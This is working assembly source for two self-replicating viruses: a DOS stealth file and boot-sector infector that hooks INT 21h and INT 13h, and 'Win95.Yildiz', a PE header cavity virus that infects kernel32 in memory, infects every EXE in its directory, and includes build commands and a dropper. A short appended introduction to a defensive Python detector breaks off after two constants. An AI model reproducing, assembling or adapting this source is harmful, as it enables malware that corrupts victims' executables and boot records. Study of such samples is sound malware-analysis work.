XCHG DS:[(12h*4)+2], AX
STOSW

STI
JMP SHORT Check_Windows

Check_4_Win: CMP CX, 3 ; Can it be 'WIN.COM' ?
JNE Check_Windows

CMP AL, 'N' ; (WI)N ?
JNE Check_Windows

DEC SI ; SI = 1st word of filename.
LODS WORD PTR ES:[SI]

AND AX, 5F5Fh ; Uppercase.

CMP AX, 'IW' ; So it's WIN.COM ?
JNE Check_Windows

MOV Windows_Active, 1 ; Set Windoze-active flag.

Check_Windows: CMP CS:Windows_Active, 1 ; Don't infect under Windoze.
JE Exit_Infect

CLI

XOR CX, CX ; DS = IVT.
MOV DS, CX

LES BX, DS:[(24h*4)] ; Save original INT 24h.
PUSH ES
PUSH BX

; Install own dummy critical-error handler.

MOV DS:[(24h*4)], OFFSET New_Int24h
MOV DS:[(24h*4)+2], CS

STI

PUSH DS

PUSH BP ; Setup stackframe.
MOV BP, SP

LDS DX, [BP+(5*2)] ; DS:DX = path of file.

POP BP

PUSH DS
PUSH DX

MOV AX, 4300h ; Get file's attributes.
CALL Do_Old_Int21h
PUSH CX
JC Restore_Attr

TEST CL, 00000001b ; Readonly bit set?
JZ Open_File

DEC CX ; Remove readonly bit.

MOV AX, 4301h ; Set new attributes.
CALL Do_Old_Int21h

Open_File: MOV AX, 3D02h ; Open target file for r/w.
CALL Do_Old_Int21h
JC Restore_Attr

XCHG BX, AX ; Save filehandle in BX.

MOV AX, 5700h ; Get file date & time.
CALL Do_Old_Int21h
JC Close_File

CALL Check_60_Secs ; Already infected?
JE Close_File

PUSH CX ; Save original filedate &
PUSH DX ; time with 60 seconds set.

CALL Infect_Handle ; Infect the handle.

POP DX
POP CX

JC Close_File ; Error occurred?

MOV AX, 5701h ; Restore file date & time
CALL Do_Old_Int21h ; with 60 seconds.

Close_File: MOV AH, 3Eh ; Close the file.
CALL Do_Old_Int21h

Restore_Attr: POP CX ; File path & attributes.
POP DX
POP DS

JC Restore_Int24h ; Error occurred?

TEST CL, 00000001b ; Need to restore the
JZ Restore_Int24h ; readonly flag?

MOV AX, 4301h ; Fix file-attributes.
CALL Do_Old_Int21h

Restore_Int24h: POP DS
POP BX
POP AX

MOV DS:[(24h*4)], BX ; Restore INT 24h.
MOV DS:[(24h*4)+2], AX
Exit_Infect: POP AX
POP DX
POP DS
POP DI
POP SI
POP CX
POP BX
POP ES

RETN

Infect_Handle:
PUSH CS
POP DS

MOV DX, OFFSET Buffer ; Read file's header.
NOP
MOV CX, 24
MOV AH, 3Fh
CALL Do_Old_Int21h

SUB CX, AX ; All bytes were read?
JNZ Error_Exit_Inf

PUSH DS ; ES = CS.
POP ES

XCHG CX, AX ; CX = 24.

MOV SI, DX ; Save a copy of the original
MOV DI, OFFSET Host_Header ; header.
CLD
REP MOVSB

MOV DI, DX ; DX = header.
MOV SI, OFFSET EXE_Data

; Save host's original SS:SP.

LES AX, DWORD PTR [DI.Program_SS]

MOV [SI+(EXE_SP-EXE_Data)], ES
MOV [SI+(EXE_SS-EXE_Data)], AX

; Save host's original CS:IP.

LES AX, DWORD PTR [DI.Program_IP]

MOV [SI+(EXE_IP-EXE_Data)], AX
MOV [SI+(EXE_CS-EXE_Data)], ES

MOV Host_Type, CL ; Initialize file as .EXE.

MOV AX, 'MZ' ; EXE marker.

CMP AX, [DI.EXE_ID] ; .EXE-ID is 'ZM' ?
XCHG AH, AL ; Change .EXE-ID to 'MZ'.
JNE Check_For_MZ

MOV [DI.EXE_ID], AX ; Set .EXE-ID to 'MZ'.

Check_For_MZ: CMP AX, [DI.EXE_ID] ; 'MZ' .EXE-file?
JE Save_File_Size

INC Host_Type ; Mark as .COM-file.

Save_File_Size: MOV AX, 4202h ; Seek to EOF.
MOV DX, CX
CALL Do_Old_Int21h
JC Exit_Inf_Hand

; Remember size of host for later use.

MOV [DI+(Host_Size-Buffer)], AX
MOV [DI+(Host_Size-Buffer)+2], DX

CMP Host_Type, EXE ; File is .EXE-type? Then
JE Check_Header ; size check ain't needed.

CMP AX,-(Virus_Size+264h) ; .COM-file ain't too big?
JB Append_Body

Error_Exit_Inf: STC ; Else mark error.

Exit_Inf_Hand: RETN

Check_Header: PUSH DI

MOV CX, 9

MOV SI, [DI.File_512_Pages] ; Filesize in 512-byte pages.
DEC SI ; Undo 512-byte round.

XOR DI, DI ; DI:SI = imagesize.

Mul_512: SHL SI, 1 ; Calculate imagesize in
RCL DI, 1 ; DI:SI.
LOOP Mul_512

CMP DX, DI ; High word doesn't match?
POP DI
JNE Error_Exit_Inf ; Then it's an overlay.

ADD SI, [DI.Image_Mod_512] ; Image size remainder.

; Low word of filesize doesn't match?

CMP SI, [DI+(Host_Size-Buffer)]
JNE Error_Exit_Inf

CMP AX, Virus_Size ; .EXE can't be smaller than
SBB DX, 0 ; the virus itself.
JC Exit_Inf_Hand

XOR DX, DX

CMP DX, [DI.Max_Size_Mem] ; Can't have a NULL maximum
JE Error_Exit_Inf ; memory requirement.

Append_Body: MOV CX, Virus_Size ; Append virusbody to file.
MOV AH, 40h
CALL Do_Old_Int21h
JC Exit_Inf_Hand

SUB CX, AX ; Were all bytes written?
JNZ Error_Exit_Inf ; Else mark as failure.

MOV DX, CX ; *** DX is already zero.

MOV AX, 4200h ; Seek to BOF.
CALL Do_Old_Int21h
JC Exit_Inf_Hand

MOV AX, [DI+(Host_Size-Buffer)]

CMP Host_Type, COM
JE Infect_COM

Infect_EXE: MOV DX, [DI+(Host_Size-Buffer)+2]

MOV CX, 4
PUSH DI
MOV SI, [DI.Header_Size]
XOR DI, DI

Mul_16: SHL SI, 1 ; Calculate headersize.
RCL DI, 1
LOOP Mul_16

SUB AX, SI ; Calculate imagesize.
SBB DX, DI

POP DI

MOV CL, 12 ; 64k's DIV 4096 to get the
SHL DX, CL ; new CS.

MOV [DI.Program_IP], AX
MOV [DI.Program_CS], DX

ADD DX, 3408/16 ; Set new stack.

MOV [DI.Program_SP], AX
MOV [DI.Program_SS], DX

ADD [DI.Min_Size_Mem], 448/16
MOV AX, [DI.Min_Size_Mem]

CMP AX, [DI.Max_Size_Mem] ; MaxMemSize must be at least
JB Calc_New_Img_S ; MinMemSize.

MOV [DI.Max_Size_Mem], AX ; MaxMemSize == MinMemSize.

Calc_New_Img_S: MOV AX, [DI.Image_Mod_512]
ADD AX, Virus_Size
PUSH AX

AND AH, 1 ; AX modulo 512.

MOV [DI.Image_Mod_512], AX
POP AX

MOV CL, 9 ; AX DIV 512.
SHR AX, CL

ADD [DI.File_512_Pages], AX
MOV DX, OFFSET Buffer
NOP
MOV CX, 24 ; Write 24 bytes (MZ-header).
JMP SHORT Write_Header

Infect_COM: MOV DX, OFFSET Buffer
NOP
MOV DI, DX
MOV BYTE PTR [DI], 0E9h ; JMP xxxx.
INC DI
SUB AX, 3 ; Calculate displacement.

PUSH DS
POP ES

CLD ; Store JMP displacement.
STOSW

MOV CX, 3 ; Write 3 bytes (JMP_Virus).

Write_Header: MOV AH, 40h ; Write modified header.
CALL Do_Old_Int21h
JC Bad_Exit

CMP AX, CX ; All bytes were written?
JE Good_Exit

Bad_Exit: STC

Good_Exit: RETN

; Infect the handle of a newly created file when it is closed.


Infect_3E:
CMP CS:File_Handle, BL ; They're closing our handle?
JNE Go_Close_Hnd

CMP CS:Valid_Handle, 1 ; Does File_Handle contain


JNE Go_Close_Hnd ; a valid filehandle at all?

DEC CS:Valid_Handle ; Reset the filehandle (0).

PUSH DS
PUSH ES
PUSH AX
PUSH BX
PUSH CX
PUSH DX
PUSH SI
PUSH DI

MOV AX, 4200h ; Seek to file's header.


XOR CX, CX
XOR DX, DX
CALL Do_Old_Int21h

CALL Infect_Handle ; Go infect the file.


JC Exit_Infect_3E

MOV AX, 5700h


CALL Do_Old_Int21h

INC AL ; *** Not used.

OR CL, (62/2) ; Set 60 seconds.


DEC CX
MOV AX, 5701h
CALL Do_Old_Int21h

Exit_Infect_3E: POP DI
POP SI
POP DX
POP CX
POP BX
POP AX
POP ES
POP DS

Go_Close_Hnd: CALL Do_Old_Int21h

JMP IRET_Flags

Go_Check_Secs:
PUSH ES
PUSH AX
PUSH BX
PUSH CX
PUSH DX
PUSH SI
PUSH DI

MOV AX, 5700h


CALL Do_Old_Int21h

OR AL, AL ; *** This seems fucked, CF


JC Exit_Go_Chk_Se ; is always cleared after OR.

CALL Check_60_Secs

Exit_Go_Chk_Se: POP DI
POP SI
POP DX
POP CX
POP BX
POP AX
POP ES

JE Stealth_Handle

JMP JMP_Old_Int21h

Check_60_Secs:
MOV AL, CL

OR CL, (62/2) ; Set 60 seconds.


DEC CX

XOR AL, CL

RETN

Stealth_Handle:
PUSH DS

PUSH DX
PUSH CX
PUSH AX

PUSH CS
POP DS

MOV Read_Count, CX ; Save CX for later use.

XOR CX, CX

MOV New_Read_Count, CX

MOV AX, 4201h ; Get current file position.


XOR DX, DX
CALL Do_Old_Int21h

MOV File_Pos, AX ; Save it for later.


MOV File_Pos+2, DX

MOV AX, 4202h ; Get filesize.


XOR DX, DX
CALL Do_Old_Int21h

SUB AX, Virus_Size ; Get original filesize.


SBB DX, 0

MOV Orig_Size, AX ; Save it.


MOV Orig_Size+2, DX

POP AX

CMP AH, 42h ; It is a seek EOF relative?


JNE Rest_File_Pos

POP CX ; CX:DX = EOF displacement.


POP DX

POP DS

PUSH CX

SUB DX, Virus_Size ; Do the seek relative to


SBB CX, 0 ; the clean filesize instead
CALL Do_Old_Int21h ; of the infected size.

POP CX

JMP IRET_Flags

JMP_Cln_Handle: JMP Clean_Handle

Rest_File_Pos: PUSH AX

MOV AX, 4200h ; Restore original position.


MOV DX, File_Pos
MOV CX, File_Pos+2
CALL Do_Old_Int21h

OR DX, DX ; They're attempting to


JNZ JA_Chk_Body_Rd ; access the 1st 64k ?

CMP AX, 23 ; The header in particular?


JA_Chk_Body_Rd: JA Chk_Body_Reach
POP AX ; Restore AX & CX.
POP CX
PUSH CX
PUSH AX

CMP AH, 3Fh ; It is a read?


JNE JMP_Cln_Handle ; Else it's a write.

MOV AX, CX ; AX = bytes to read.

ADD CX, File_Pos ; Calculate end offset after


; the read.

JC Calc_Count_Hdr ; Above 64k ?

CMP CX, 24 ; Does the read touch the


JB Sub_St_Size ; entire header?

Calc_Count_Hdr: MOV AX, 24 ; Calculate howmany bytes


SUB AX, File_Pos ; to stealth in the header.

MOV New_Read_Count, AX ; Save the new read count.

Sub_St_Size: SUB Read_Count, AX ; The header will be read by


; the virus, so adjust the
; caller read count.
PUSH AX

MOV AX, 4200h ; Seek to the host's clean


MOV CX, Orig_Size+2 ; header. *** The caller's
MOV DX, Orig_Size ; header offset should be
ADD DX, OFFSET Host_Header ; added aswell, now it screws
ADC CX, 0 ; up on header reads that
CALL Do_Old_Int21h ; don't start at offset 0.

POP CX ; CX = howmany bytes to


; stealth in header.
PUSH BP
MOV BP, SP

LDS DX, [BP+(3*2)] ; Read buffer of the caller.

POP BP

MOV AH, 3Fh ; Read the clean header


CALL Do_Old_Int21h ; into the caller's buffer.

PUSH CS
POP DS

PUSH AX
PUSH CX

ADD File_Pos, AX ; Update saved position.


ADC File_Pos+2, 0

MOV DX, File_Pos ; Restore file position.


MOV CX, File_Pos+2
MOV AX, 4200h
CALL Do_Old_Int21h

POP CX
POP AX

SUB CX, AX ; Not all bytes were read?


JNZ Error_St_Exit ; Then bail.

CMP Read_Count, 0 ; No more bytes need to be


JNZ Chk_Body_Reach ; read? Then IRET back.

POP CX
POP CX

MOV AX, CX ; AX = 0.

JZ Exit_Stealth_1

Error_St_Exit: POP DX
POP DX

Exit_Stealth_1: POP DX
POP DS

JMP IRET_Flags

Chk_Body_Reach: POP AX ; Value of AX on entry.


PUSH AX

MOV CX, File_Pos ; Original fileposition


MOV DX, File_Pos+2 ; where the action starts.

CMP DX, Orig_Size+2 ; Below virus' 64k ?


JB Calc_End_Pos

CMP CX, Orig_Size ; Below virus' code? If not,


JBE Calc_End_Pos ; the virusbody gets read or
; overwritten, so stealth it.

CMP AH, 40h ; If it's a write then go


JE Clean_Handle ; disinfect the handle.

POP AX
POP CX

XOR AX, AX ; Return 0 bytes read when


JZ Exit_Stealth_1 ; they try to read from after
; the original host.

Calc_End_Pos: ADD CX, Read_Count ; Calculate end position


ADC DX, 0 ; after the read/write.

CMP DX, Orig_Size+2 ; Below the virusbody?


JB Do_Function

CMP CX, Orig_Size


JBE Do_Function

CMP AH, 40h ; If it's a write then


JE Clean_Handle ; disinfect the handle.

MOV CX, Orig_Size


MOV DX, Orig_Size+2

SUB CX, File_Pos


SBB DX, File_Pos+2
OR DX, DX ; *** Obsolete instruction.
JZ Set_New_Byte_C

MOV CX, -1
SUB CX, New_Read_Count

Set_New_Byte_C: MOV Read_Count, CX

Do_Function: POP AX
POP CX
POP DX
POP DS
PUSH CX

PUSH AX
PUSH DX

MOV CX, CS:Read_Count


ADD DX, CS:New_Read_Count
CALL Do_Old_Int21h

ADD AX, CS:New_Read_Count

POP DX
POP CX

CMP CH, 3Fh ; It aint a read? Then it's


JE Exit_Stealth_2 ; a get/set filedate & time.

PUSH AX
PUSH DX

MOV AX, 5700h ; Get file's date & time.


CALL Do_Old_Int21h

INC AL ; AX = 5701h.
OR CL, (62/2) ; Set 60 seconds.
DEC CX
CALL Do_Old_Int21h

POP DX
POP AX

Exit_Stealth_2: POP CX
JMP IRET_Flags

Clean_Handle:
MOV WORD PTR Valid_Handle, 0001h
MOV File_Handle, BL

MOV AX, 4200h ; Seek to the old header.


MOV CX, Orig_Size+2
MOV DX, Orig_Size
ADD DX, OFFSET Host_Header
ADC CX, 0
CALL Do_Old_Int21h

MOV AH, 3Fh ; Read it in.


MOV CX, 24
MOV DX, OFFSET Buffer
NOP
CALL Do_Old_Int21h
MOV AX, 4200h ; Seek to the old EOF.
MOV DX, Orig_Size
MOV CX, Orig_Size+2
CALL Do_Old_Int21h

MOV AH, 40h ; Write new EOF marker.


XOR CX, CX
CALL Do_Old_Int21h

MOV AX, 4200h ; Seek to BOF.


XOR CX, CX
XOR DX, DX
CALL Do_Old_Int21h

MOV AH, 40h ; Restore old header.


MOV CX, 24
MOV DX, OFFSET Buffer
NOP
CALL Do_Old_Int21h

MOV AX, 4200h ; Restore original file pos.


MOV DX, File_Pos
MOV CX, File_Pos+2
CALL Do_Old_Int21h

POP AX
POP CX
POP DX
POP DS

JMP SHORT JMP_Old_Int21h

Check_Win_Exit:
POP BX ; Remove return IP off stack.
POP CX ; POP program's return CS.

PUSH CX
PUSH BX
PUSH AX

DEC CX ; Get program's MCB.


MOV DS, CX

MOV SI, 8 ; SI = name of terminating


; program.

CLD ; Fetch 1st word of filename.


LODSW
XCHG BX, AX

LODSW ; Fetch 2nd word of filename.


XCHG DX, AX

POP AX

CMP BX, 'IW' ; Is it WIN.COM that's


JNE J2_J_Old_i21h ; terminating?

CMP DX, 'N'


JNE J2_J_Old_i21h
DEC CS:Windows_Active ; If so, reset the flag.

J2_J_Old_i21h: JMP SHORT JMP_Old_Int21h

Stealth_Seconds:
PUSH AX
PUSH CX
PUSH DX

MOV AX, 5700h ; Get file's date & time.


CALL Do_Old_Int21h

PUSH AX
PUSH CX

CALL Check_60_Secs ; Check if it's infected.

POP CX
POP AX

POP DX
POP CX
POP AX

JNE JMP_Old_Int21h ; If it ain't then get out.

OR AL, AL ; Get file date & time?


JNZ Stealth_Set ; Else it's a set.

CALL Do_Old_Int21h ; Do the call.

AND CL, 11100000b ; Clear seconds.


JMP IRET_Flags

Stealth_Set: OR CL, (62/2) ; Set 60 seconds.


DEC CX

JNZ JMP_Old_Int21h ; This jump is always taken.

Do_Old_Int21h: PUSHF ; Simulate an interrupt 21h.


CALL DWORD PTR CS:Old_Int21h

RETN

JMP_Old_Int21h: JMP DWORD PTR CS:Old_Int21h

Host_Header: DB 0CDh, 20h


DB 22 DUP (0)

; This ISR stealths the first INT 12h and then unhooks itself, this way
; MEM and CHKDSK will report the untouched total DOS memory size.
New_Int12h:
PUSH DS
PUSH ES
PUSH BX

XOR AX, AX ; DS = IVT.


MOV DS, AX

LES BX, DWORD PTR CS:Old_Int12h

CLI ; Restore original INT 12h.


MOV DS:[(12h*4)], BX
MOV DS:[(12h*4)+2], ES
STI

POP BX
POP ES
POP DS

INT 12h ; Do the original INT 12h.

ADD AX, Virus_Size_1024 ; Stealth DOS memory size.

IRET

DB '10/23/92', 0
Origin = BYTE PTR $-1

File_Int21h:
CMP AX, 0EEE7h ; Residency check?
JE Return_ID_2

CMP AX, 3513h ; Get INT 13h ?


JE Get_Int13h_St

CMP AX, 3521h ; Get INT 21h ?


JE Get_Int21h_St

CMP AX, 2513h ; Set INT 13h ?


JE Set_Int13h_St

CMP AX, 2521h ; Set INT 21h ?


JE Set_Int21h_St

JMP DWORD PTR CS:600h+(Old_Int21h-File_Int21h)

Return_ID_2: MOV AX, 0D703h ; Return ID word to caller.


IRET

Get_Int13h_St: LES BX, DWORD PTR CS:600h+(Old_Int13h-File_Int21h)


IRET

Get_Int21h_St: LES BX, DWORD PTR CS:600h+(Old_Int21h-File_Int21h)


IRET

Set_Int13h_St: MOV CS:600h+(Old_Int13h-File_Int21h), DX


MOV CS:600h+(Old_Int13h-File_Int21h)+2, DS
IRET

Set_Int21h_St: MOV CS:[600h+(Old_Int21h-File_Int21h)], DX


MOV CS:[600h+(Old_Int21h-File_Int21h)+2], DS
IRET

Act_Partition DW 0

Boot_Int13h:
CMP DX, 80h ; 1st HD - head zero?
JNE JMP_Boot_i13h

CMP CX, Virus_Size_512+2 ; Operation concerns the


JNB JMP_Boot_i13h ; MBS or virussectors?
CMP AH, 02h ; Sector read?
JE Check_For_MBS

CMP AH, 03h ; Sector write?


JE Check_For_MBS

JMP_Boot_i13h: JMP DWORD PTR CS:[0000h] ; Jump to the previous ISR.


Ofs_Old_Int13h = WORD PTR $-2

Check_For_MBS: CMP CX, 1 ; It's the MBS ?


JNE Check_If_Write

CMP AH, 02h ; It is a MBS read?


JE Do_Read_Write ; Else it's a write.

PUSH SI

CALL Get_Act_Partition ; Get delta offset to active partition.

MOV ES:[BX+SI], 0200h ; Set the infected partition in the MBS so the
; written MBS will still be infected.
POP SI

Do_Read_Write: PUSH AX

MOV AL, 1 ; Only read/write to the MBS.

PUSHF ; Carry out the read/write.


CALL DWORD PTR CS:[0]
Ofs_Real_Int13h = WORD PTR $-2

POP AX

CMP AH, 03h ; It was a write?


JE Success_IRET

PUSH SI ; Else stealth the read.

CALL Get_Act_Partition

MOV ES:[BX+SI], 0101h ; Put back the original MS-DOS partition start.
POP SI

CMP AL, 1
JE Success_IRET

Check_If_Write: CMP AH, 03h ; It was a write?


JE Success_IRET

PUSH AX
PUSH CX
PUSH DX
PUSH DI

XOR AH, AH

MOV DI, BX ; ES:DI = readbuffer.

CMP CX, 1
MOV CX, 512
JNE Calc_Sec_Size

DEC AX ; Skip the MBS.


ADD DI, CX ; Next sector.

Calc_Sec_Size: MUL CX ; Sectorcount * 512.

OR DX, DX
JZ Clear_Buffer

MOV CX, 0

Clear_Buffer: XCHG CX, AX

CLD

Clear_Byte: STOSB
LOOP Clear_Byte

POP DI
POP DX
POP CX
POP AX

Success_IRET: CLC ; Mark success. *** The next XOR clears CF already.
XOR AH, AH

IRET_Flags: PUSH AX
LAHF

PUSH BP
MOV BP, SP

MOV [BP+(4*2)], AH ; Set new flags in stack.

POP BP
POP AX

IRET

; Gets the active partition.
Get_Act_Partition:

CALL Get_Delta_2
Get_Delta_2: POP SI
SUB SI, OFFSET Get_Delta_2

MOV SI, CS:[SI+Act_Partition]

RETN
End_Body:

Old_Int08h = WORD PTR $+0


Old_Int21h = WORD PTR $+4
Old_Int01h = WORD PTR $+8
Old_Int12h = WORD PTR $+8
Old_Int13h = WORD PTR $+12
Real_Int13h = WORD PTR $+16
Buffer = $+20
Read_Count = WORD PTR $+44
Host_Size = WORD PTR $+44
New_Read_Count = WORD PTR $+46
File_Pos = WORD PTR $+48
Host_Type = BYTE PTR $+49
Orig_Size = WORD PTR $+52
Valid_Handle = BYTE PTR $+56
File_Handle = BYTE PTR $+57

EXE_Header STRUC
EXE_ID DW 0
Image_Mod_512 DW 0
File_512_Pages DW 0
Reloc_Items DW 0
Header_Size DW 0
Min_Size_Mem DW 0
Max_Size_Mem DW 0
Program_SS DW 0
Program_SP DW 0
Checksum DW 0
Program_IP DW 0
Program_CS DW 0
Reloc_Table DW 0
EXE_Header ENDS

Find_FN_FCB STRUC
FCB_Drive DB 0
FCB_Name DB 8 DUP(0)
FCB_Ext DB 3 DUP(0)
FCB_Attr DB 0
FCB_Reserved DB 10 DUP(0)
FCB_Time DW 0
FCB_Date DW 0
FCB_Start_Clust DW 0
FCB_Size DW 0, 0
Find_FN_FCB ENDS

END START
; *************************************************************************
; ********************                                 ********************
; ********************         Win95.Yildiz            ********************
; ********************              by                 ********************
; ********************          Black Jack             ********************
; ********************                                 ********************
; *************************************************************************
;
;
;NAME: Win95.Yildiz
;AUTHOR: Black Jack [independent Austrian Win32asm virus coder]
;CONTACT: Black_Jack_VX@hotmail.com | http://www.coderz.net/blackjack
;TYPE: Win9x direct acting/global ring3 resident PE header cavity virus
;SIZE: 323 bytes (but of course infected files won't increase in size)
;
;DESCRIPTION: When an infected file is run, the virus takes control. It then
; tries to find the kernel32 base address by a simple algorithm
; which should make it compatible with Win9X and WinME (although I
; haven't tested it with the second one). After that it gets the
; undocumented Win9X API VxDCall0 and uses it to call int 21h. The
; VxDCall0 API is the very first exported API in Win9X; I don't
; know which API is first in WinNT, that's why unpredictable
; results may occur when the virus runs in that OS (I haven't tried
; it out, but of course the virus can't work in NT).
; Then it goes TSR (read more about this a bit later), and infects
; all PE EXE files in the current directory by overwriting the
; unused padding bytes in the PE header with the virus body.
; The memory residency consists of infecting kernel32.dll in memory.
; To do so, it creates a temporary file called "Yildiz." and writes
; the first 4KB of kernel32.dll there. Then this file is infected
; like any other PE file. And finally the content of the infected
; temp file is read back into kernel32 memory. Yep, you have read
; right: by using int 21h via VxDCall0 you can read from a file
; into read-only memory! (This trick was discovered by Murkry/IkX,
; read more about it in the comments to his Darkside virus source,
; published in Xine#3).
; As I have already said, kernel32 is infected in memory just
; like any other file; this means the entry point is set to the
; virus, no APIs are hooked. As you should know, the entry point
; of a DLL is an init routine that is called whenever the DLL is
; loaded by a program. And since kernel32 is imported by all
; programs, this means for us that whenever a program is run (and
; kernel32 is mapped into the program's address space), our virus
; will infect all PE EXE files in the directory of the program.
;
;ASSEMBLE WITH:
; tasm32 /mx /m yildiz.asm
; tlink32 /Tpe /aa yildiz.obj,,, import32.lib
;
; there's no need for PEWRSEC or a similar tool, because the
; virus code is supposed to run in read-only memory anyways.
;
;DISCLAIMER: I do *NOT* support the spreading of viruses in the wild.
; Therefore, this source was only written for research and
; education. Please do not spread it. The author can't be held
; responsible for what you decide to do with this source.
; ===========================================================================

virus_size EQU (virus_end - virus_start)

Extrn MessageBoxA:Proc ; for first generation only


Extrn ExitProcess:Proc
.386p
.model flat
.data
dd 0 ; dummy data, you know...

.code
virus_start:
pushad ; save all registers

xchg edi, eax ; put delta offset to EDI (EAX=start
; offset of program by default)

mov eax, [esp+8*4] ; EAX=some address inside kernel32

sub esp, size stack_frame ; reserve room on stack


mov esi, esp ; set ESI to our data on the stack

search_kernel32:
xor ax,ax ; we assume the least significant
; word of the kernel32 base is zero
cmp word ptr [eax], "ZM" ; is there a MZ header ?
JE found_kernel32 ; if yes, we found the correct
; kernel32 base address
dec eax ; 0BFF80000->0BFF7FFFF, and then the
; least significant word is zeroed
JMP search_kernel32 ; check next possible kernel32 base

tmp_filename db "Yildiz", 0
filespec db "*.EXE", 0

found_kernel32:
mov ebx, [eax+3Ch] ; EBX=kernel32 PE header RVA
add ebx, eax ; EBX=offset of kernel32 PE header

mov ebx, [ebx+120] ; EBX=export table RVA


mov ebx, [ebx+eax+1Ch] ; EBX=Address array of API RVAs
mov ebx, [ebx+eax] ; get the first API RVA: VxDCall0
add ebx, eax ; EBX=Offset VxDCall0 API
mov [esi.VxDCall0], ebx ; save it
lea ebp, [edi+int21h-virus_start] ; EBP=offset of our int21h procedure
; for optimisation reasons, the
; CALL EBP instruction is just 2 bytes

; ----- GO TSR --------------------------------------------------------------

lea edx, [edi+tmp_filename-virus_start] ; EDX=pointer to tmp filename


push edx ; save it on stack

push eax ; save kernel32 base address on stack

mov ah, 3Ch ; create temp file


xor ecx, ecx ; no attributes
call ebp ; call our int 21h procedure

xchg ebx, eax ; filehandle to EBX, where it belongs

pop edx ; EDX=kernel32 base address


push edx ; save it again

call write_file ; write start of kernel32 to temp file


call infect ; infect the temp file

pop edx ; EDX=kernel32 base address

mov ah, 3Fh ; read infected kernel32 file start
call read_write ; into kernel32 memory

mov ah, 3Eh ; close temp file


call ebp ; call our int 21h procedure

pop edx ; EDX=pointer to temp filename


mov ah, 41h ; delete temp file
call ebp ; call our int 21h procedure

; ----- INFECT ALL FILES IN CURRENT DIR -------------------------------------

mov ah, 2Fh ; get DTA


call ebp ; call our int 21h procedure

push es ; save DTA address to stack


push ebx

push ds ; ES=DS (standart data segment)


pop es

mov ah, 1Ah ; set DTA to our data area


lea edx, [esi.dta] ; DS:EDX=new DTA adress
call ebp ; call our int 21h procedure

mov ah, 4Eh ; find first file


xor ecx, ecx ; only files with standart attributes
lea edx, [edi+(filespec-virus_start)] ; EDX=offset of filespec

findfile_loop:
call ebp ; call our int 21h procedure
JC all_done ; no more files found?

mov ax, 3D02h ; open victim file for read and write
lea edx, [esi.dta+1Eh] ; DS:EDX=pointer to filename in DTA
call ebp ; call our int 21h procedure

xchg ebx, eax ; handle to EBX, where it belongs

call infect ; infect the file

mov ah, 3Eh ; close the victim file


call ebp ; call our int 21h procedure

search_on:
mov ah, 4Fh ; find next file
JMP findfile_loop

; ----- RESTORE HOST --------------------------------------------------------

all_done:
pop edx ; restore old DTA offset in DS:EDX
pop ds
mov ah, 1Ah ; reset DTA to old address
call ebp ; call our int 21h procedure
push es ; DS=ES (standart data segment)
pop ds

add esp, size stack_frame ; remove our data buffer from stack

popad ; restore all registers

db 05h ; add eax, imm32
entry_RVA_difference dd (host-virus_start) ; difference between host and
; virus entrypoint (EAX is virus
; entrypoint offset by default)
JMP eax ; jump to host entrypoint

; ----- END MAIN PART OF THE VIRUS CODE -------------------------------------

exit_infect:
pop edi ; restore EDI (delta offset)
RET ; return to caller

; ----- INFECT AN OPENED FILE (HANDLE IN BX) --------------------------------

infect:
push edi ; save EDI (delta offset)

mov edx, esi ; EDX=read/write buffer offset


mov ah, 3Fh ; read start of file
call read_write

cmp word ptr [esi], "ZM" ; is it an exe file ?


JNE exit_infect ; cancel infection if not

mov ecx, [esi+3Ch] ; ECX=new header RVA


cmp ecx, 3*1024 ; check if DOS stub is small enough
; so that all the PE header is in
; our buffer
JA exit_infect ; if not, cancel infection

lea edi, [esi+ecx] ; EDI=PE header offset in memory


cmp word ptr [edi], "EP" ; is it an PE file ?
; (I know that the PE marker is
; actually a dword, but by only
; checking one word we save a byte
; of virus code)
JNE exit_infect ; cancel infection if not

cmp dword ptr [edi+28h], 4096 ; check if entrypoint RVA is in the


; first 4 KB of the file
JB exit_infect ; if yes, the file must be already
; infected, cancel infection

add ecx, 24 ; add size of FileHeader


movzx eax, word ptr [edi+14h] ; EAX=size of Optional header
add ecx, eax ; add it to ECX
movzx eax, word ptr [edi+6] ; EAX=NumberOfSections
imul eax, eax, 40 ; get size of section headers to EAX
add ecx, eax ; add it to ECX, now it points to the
; end of the used part of the PE
; header, where the virus will be.

mov edx, ecx ; EDX=virus RVA


xchg dword ptr [edi+28h], edx ; set it as new entrypoint RVA
sub edx, ecx ; EDX=difference between old and new
; entrypoint RVA
mov eax, [edi+54h] ; EAX=SizeOfHeaders (aligned to
; FileAlign)

lea edi, [esi+ecx] ; EDI=virus offset in buffer

sub eax, ecx ; EAX=free room for us to use


mov cx, virus_size ; ECX=size of virus (the most
; significant word of ECX should be 0)
cmp eax, ecx ; enough room for the virus ?
JL exit_infect ; cancel infection if not

pop eax ; EAX=delta offset


push eax ; save it again to stack
xchg esi, eax ; ESI=delta offset, EAX=data buffer

cld ; clear direction flag


rep movsb ; move virus body into buffer

xchg esi, eax ; ESI=pointer to our data on stack

mov [edi-(virus_end-entry_RVA_difference)], edx ; store difference between
; old and new entrypoint

pop edi ; restore EDI (delta offset)

mov edx, esi ; EDX=offset of read/write buffer

; now write modified start of file, then return to caller

write_file:
mov ah, 40h ; write to file

read_write:
xor ecx, ecx ; ECX=0
pushad ; save all registers

xor eax, eax ; EAX=4200h (set filepointer from
mov ah, 42h ; start of the file)
cdq ; CX:DX=0 (new filepointer)
call ebp ; call our int 21h procedure

popad ; restore all registers

mov ch, 10h ; ECX=4096 (size of read/write buffer)

; now execute int 21h and return

int21h: ; protected mode int21


push ecx ; push parameters
push eax
push 2A0010h ; VWIN32_Int21Dispatch function
call ss:[esi.VxDCall0] ; call VxDCall0 API
ret

virus_end:

; This is our data that will be stored on the stack:

stack_frame struc
buffer db 4096 dup(?)
dta db 43 dup(?)
VxDCall0 dd ?
stack_frame ends

host:
push 0
push offset caption
push offset message
push 0
call MessageBoxA

push 0
call ExitProcess

caption db "Win95.Yildiz Virus (c) 2000 Black Jack", 0


message db "first generation dropper", 0

end virus_start
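A defender's counterpart to the header-cavity technique the Yildiz description above explains, added here as an example and not part of Black Jack's source: it reads the same PE fields the infect routine uses (NumberOfSections, SizeOfOptionalHeader, AddressOfEntryPoint, SizeOfHeaders), computes where the used part of the header ends, and flags a file whose entry point lies in the padding between that point and SizeOfHeaders. The function names and the constructed test image from build_sample_pe are mine; the page contains no such helper.

```python
import struct

PE_SIGNATURE = b"PE\0\0"
SECTION_HEADER_SIZE = 40            # sizeof(IMAGE_SECTION_HEADER)


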